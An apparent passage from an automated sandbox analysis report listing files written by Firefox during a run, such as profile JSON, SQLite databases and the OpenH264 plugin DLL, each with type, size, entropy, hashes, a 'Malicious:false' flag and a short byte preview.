                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:V2YbKsKNU2xWrp327tGmD4wBON6h6cHaJVJuZMd0JGkkrw2D:VTx2x2t0FDJ4NpwZMd0EJws
                                                                                                                                                                                                                                                                                                                                                      MD5:1B9C8056D3619CE5A8C59B0C09873F17
                                                                                                                                                                                                                                                                                                                                                      SHA1:1015C630E1937AA63F6AB31743782ECB5D78CCD8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:A6AE5DE0733FED050AB570AD9374FF4593D554F695B5AE4E2495871D171D34A3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B1DC9CC675D5476C270A2D5B214D3DF2B3856576ED7EFE92D9A606C2D9D34E781018902AE75CE9C1E25007BB7F8D8F7B52997E6F05B845EF44BAF22F614FE899
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:mozLz40..[....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."*://login.microsoftonline.com/*","..@us/*L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay*....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\addons.json (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.91829583405449
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                                                                                                                                                                                                                                                                                      MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                                                                                                                                                                                      SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                                                                                                                                                                                      SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"schema":6,"addons":[]}

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\addons.json.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.91829583405449
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                                                                                                                                                                                                                                                                                      MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                                                                                                                                                                                      SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                                                                                                                                                                                      SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"schema":6,"addons":[]}

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\content-prefs.sqlite

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 5, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 8, cookie 0x6, schema 4, largest root page 8, UTF-8, vacuum mode 1, version-valid-for 4
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):262144
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.04905141882491872
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:DLSvwae+Q8Uu50xj0aWe9LxYkKA25Q5tvAA:DKwae+QtMImelekKDa5
                                                                                                                                                                                                                                                                                                                                                      MD5:8736A542C5564A922C47B19D9CC5E0F2
                                                                                                                                                                                                                                                                                                                                                      SHA1:CE9D58967DA9B5356D6C1D8A482F9CE74DA9097A
                                                                                                                                                                                                                                                                                                                                                      SHA-256:97CE5D8AFBB0AA610219C4FAC3927E32C91BFFD9FD971AF68C718E7B27E40077
                                                                                                                                                                                                                                                                                                                                                      SHA-512:99777325893DC7A95FD49B2DA18D32D65F97CC7A8E482D78EDC32F63245457FA5A52750800C074D552D20B6A215604161FDC88763D93C76A8703470C3064196B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......|....~.}.}z}-|.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\crashes\store.json.mozlz4 (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):66
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.837595020998689
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                                                                                                                                                                                      MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                                                                                                                                                                                      SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\crashes\store.json.mozlz4.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):66
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.837595020998689
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                                                                                                                                                                                      MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                                                                                                                                                                                      SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\extensions.json (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):36830
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.187080624303907
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:9I4ivfiXD4R6C444ylW47s48yilvs4/4ji4P4a4Bd4U:9i1AyQvP
                                                                                                                                                                                                                                                                                                                                                      MD5:5774E6BEEB8C63A660A4C37E130F7D30
                                                                                                                                                                                                                                                                                                                                                      SHA1:B3F7B89A4A143BA839593F6368822C5E7C0FE20D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:E2C331AEE64E1D381A7D9E579E7EB7236AFDE83239780D18945DE3152602E610
                                                                                                                                                                                                                                                                                                                                                      SHA-512:2F16D11971091141224DFF45721E96E5617CCA12E6EC5AC037770D35251CEC28D8758929474424F01B2BBD6236EDBCE82CD2E20FECE3A95E5C0173E345979E47
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{45005050-3e88-41ad-8766-e52c88f37369}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\extensions.json.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):36830
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.187080624303907
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:9I4ivfiXD4R6C444ylW47s48yilvs4/4ji4P4a4Bd4U:9i1AyQvP
                                                                                                                                                                                                                                                                                                                                                      MD5:5774E6BEEB8C63A660A4C37E130F7D30
                                                                                                                                                                                                                                                                                                                                                      SHA1:B3F7B89A4A143BA839593F6368822C5E7C0FE20D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:E2C331AEE64E1D381A7D9E579E7EB7236AFDE83239780D18945DE3152602E610
                                                                                                                                                                                                                                                                                                                                                      SHA-512:2F16D11971091141224DFF45721E96E5617CCA12E6EC5AC037770D35251CEC28D8758929474424F01B2BBD6236EDBCE82CD2E20FECE3A95E5C0173E345979E47
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{45005050-3e88-41ad-8766-e52c88f37369}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\favicons.sqlite-shm

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1021904
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.648417932394748
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
                                                                                                                                                                                                                                                                                                                                                      MD5:FE3355639648C417E8307C6D051E3E37
                                                                                                                                                                                                                                                                                                                                                      SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                                                                                                                                                                                                                                                                                      SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                      • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: rpDOUhuBC5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: rpDOUhuBC5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: cMTqzvmx9u.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: NetFxRepairTools.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: nM0h824cc3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: nM0h824cc3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: gTU8ed4669.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: gTU8ed4669.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1021904
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.648417932394748
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
                                                                                                                                                                                                                                                                                                                                                      MD5:FE3355639648C417E8307C6D051E3E37
                                                                                                                                                                                                                                                                                                                                                      SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                                                                                                                                                                                                                                                                                      SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):116
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.968220104601006
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
                                                                                                                                                                                                                                                                                                                                                      MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                                                                                                                                                                                                                                                                                      SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):116
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.968220104601006
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
                                                                                                                                                                                                                                                                                                                                                      MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                                                                                                                                                                                                                                                                                      SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.034879679751218286
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:GtWt8BUAtPMXLIPWt8BUAtPMXRD89XuM:KtPMMrtPMhDsuM
                                                                                                                                                                                                                                                                                                                                                      MD5:40190EADA6F596D0EF3D69BDF9958749
                                                                                                                                                                                                                                                                                                                                                      SHA1:6186D14F4B5F7CCE0025B000EA5D5070B6789171
                                                                                                                                                                                                                                                                                                                                                      SHA-256:4E93C36FFC20567F378BE09CF72AB773E3034DDDB6B593E3027B60DC29D1765E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:56092D41786AD9FD65504CB6BC1134347159770D84DD4FD4FBDB10DDFE9F335F60E27797EAA827B680972B11645DEDB4CFDF7C92F93D09EB04BB9D3D08C24C84
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:..-.......................).;3..m4$..eEM......L..-.......................).;3..m4$..eEM......L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite-wal

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32824
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.039337408163668056
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ol10ZukulfzIRB5SH/rl8rEXsxdwhml8XW3R2:KeZMhIRTSfrl8dMhm93w
                                                                                                                                                                                                                                                                                                                                                      MD5:227AF594E5F102A2C9A926E6622FF33E
                                                                                                                                                                                                                                                                                                                                                      SHA1:FDB72172BF311F3BB6A25DF8CE87F39325F315BA
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5C06E323714D53B97AE49B12DB4241944EB192872543BB48515EB8F6D2515E6E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:F604DC3405317863D120AA85EE4617D91FB9346CB4CEE66E4C7970FF76A5565120603F4EB502206A27A82D9C8F1EA667DBB8AD4D6F5B313D74D08CE6C5FD82BB
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:7....-...........m4$..eE..p...ah.........m4$..eE.)....3;................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\prefs-1.js

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):13162
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.487212618258305
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:jnGRvo1YYbBp6PKDLZwxhaXJ6+RLNONy5RuFNBw8dqSl:8e3Fwx9ixvEw90
                                                                                                                                                                                                                                                                                                                                                      MD5:9B801C625E2E1C741D62E2CEBB308F25
                                                                                                                                                                                                                                                                                                                                                      SHA1:7E0A3C91B22AA12755A74CA3A7FF8BA2E6A4B0BA
                                                                                                                                                                                                                                                                                                                                                      SHA-256:CE494323D85F73C6D9588C2D797878AABD381F11C6CAB7D5156F3E807101FFFA
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EEA9CCCDFAF5C798F14E435D3F9254BD2D2FA423184862835050734C274192A3A75FDAE5D56145522050B391AD7BA3FB0A27678DF70702CD5B0C69B5A0542357
